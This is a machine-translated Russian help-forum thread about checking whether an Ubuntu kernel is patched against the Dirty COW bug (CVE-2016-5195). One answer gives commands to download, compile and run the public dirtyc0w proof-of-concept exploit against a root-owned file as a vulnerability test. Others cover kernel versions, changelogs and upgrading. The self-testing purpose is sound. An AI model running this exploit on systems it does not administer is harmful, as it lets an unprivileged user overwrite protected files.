Как я могу узнать, была ли исправлена ​​моя система Ubuntu, поэтому она не может быть отвратительной для Dirty Cow?

Моя система Ubuntu 14.04LTS. uname -rv дает следующее

 4.4.0-45-generic #66~14.04.1-Ubuntu SMP Wed Oct 19 15:05:38 UTC 2016. 

Как я могу узнать, была ли исправлена ​​моя система для решения проблемы с грязной коровой?

Если это не так, как я могу его получить?

Я запустил Software Update и больше не обнаружил обновлений.

4 Solutions collect form web for “Как я могу узнать, была ли исправлена ​​моя система Ubuntu, поэтому она не может быть отвратительной для Dirty Cow?”

Все версии до следующих версий затронуты:

 4.8.0-26.28 for Ubuntu 16.10 4.4.0-45.66 for Ubuntu 16.04 LTS 3.13.0-100.147 for Ubuntu 14.04 LTS 3.2.0-113.155 for Ubuntu 12.04 LTS 3.16.36-1+deb8u2 for Debian 8 3.2.82-1 for Debian 7 4.7.8-1 for Debian unstable 

Если вам нужно протестировать свою систему, вы можете загрузить и скомпилировать PoC:

 curl https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c > dirtyc0w.c 

Поскольку root создает файл foo :

 sudo -s echo This is a TEST > foo 

Проверь это:

 ls -l foo 

По мере запуска пользователя :

  gcc -pthread dirtyc0w.c -o dirtyc0w ./dirtyc0w foo m00000000000000000 

Проверьте, изменен ли файл foo :

Если вы получите это:

cat foo :

 m00000000000000000 

Вы УЯЗВИМЫЕ.

Если ваш файл не изменился: This is a TEST >> вы в безопасности.

Для исправления вашей системы просто выполните:

 sudo apt-get update && sudo apt-get dist-upgrade 

вы можете использовать aptitude. Но в Ubuntu вы должны установить его.

 aptitude changelog package 

Я настроил свою систему так, чтобы стать электронной почтой от системы до своего E-Mail-клиента.

приветствие бахамут

PS он также работает с apt-get changelog package

Я забыл

  1. если версия вашего ядра> затронута версией

    uname -r

  2. проверьте журналы изменений, как apt, так и yum имеют журналы изменений

    $ apt-get changelog linux-image-4.3.0-1-amd64 | grep "..."

для систем на основе RHEL я всегда проверял файлы изменений, но я уверен, что есть аналогичный инструмент, например, с помощью apt-get changelog …

Спасибо за вашу помощь. Bahamut-apt-get changelog linux-image-4.4.0-45-generic give-linux-lts-xenial (.66 ~ 14.04.1) trusty; Актуальность = низкий

  • CVE-2016-5195

    • СОУС: mm: удалить gup_flags игры FOLL_WRITE из __get_user_pages ()
  • srcname из правила монтирования, поврежденного под нагрузкой (LP: # 1634753)

    • СОУС: apparmor: исправить сон в критическом разделе

    – Stefan Bader Wed, 19 Oct 2016 11:24:20 +0200 Я думаю, что CVE-2016-5195 – это исправление для Dirty Cow. Можете ли вы подтвердить, что я в порядке?

Interesting Posts

Почему Samba настаивает на регистрации в качестве гостевого пользователя?

Подача юникода на unrtf

Btrfs RAID1 несовместимые диски полностью

Печать цветного текста с использованием скрипта

Обходной режим CLIENT (порт smtps / 465) не реализован

FreeBSD: IPv6 в Jails (ezjail)

Калий Linux USB Live Boot не работает

Найти файлы с групповыми разрешениями более ограничительными, чем разрешения владельца

Почему в моей системе Fedora 14 с интегрированным графическим контроллером Intel Mobile GME965 / GLE960 возникает неправильное соотношение сторон?

Оболочка xmllint не показывает число из выражения count xpath?

Как я могу удалить изменения из наложения fs?

Можно ли изменить порядок позиций в постоянном буфере обмена Parcellite?

Будет ли cat * .txt конкатенировать файлы в алфавитном порядке?

Segfault пытается получить доступ к пользователям в настройках

Фиксирование сломанных пакетов в дистрибутиве тестирования Debian

Linux и Unix - лучшая ОС в мире.